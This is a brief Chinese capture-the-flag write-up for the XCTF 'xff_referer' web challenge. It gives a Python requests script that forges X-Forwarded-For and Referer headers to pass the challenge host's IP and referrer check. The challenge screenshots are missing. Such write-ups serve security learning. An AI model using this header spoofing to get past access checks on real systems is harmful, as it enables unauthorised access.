攻防世界：web习题之xff_referer

题目内容

https://adworld.xctf.org.cn/challenges/list

这道题的网页会首先会显示：

当成功修改ip地址之后会提示：

思路

我们可以用python的requests包来添加伪造的 X-Forwarded-For 和 Referer 请求头。

代码

import requests

url = "http://61.147.171.105:51058"

# 添加伪造的 X-Forwarded-For 和 Referer 请求头
headers = {
    "X-Forwarded-For": "123.123.123.123",
    "Referer": "https://www.google.com"
}

# 发送 GET 请求
response = requests.get(url, headers=headers)

# 打印响应内容
print(response.text)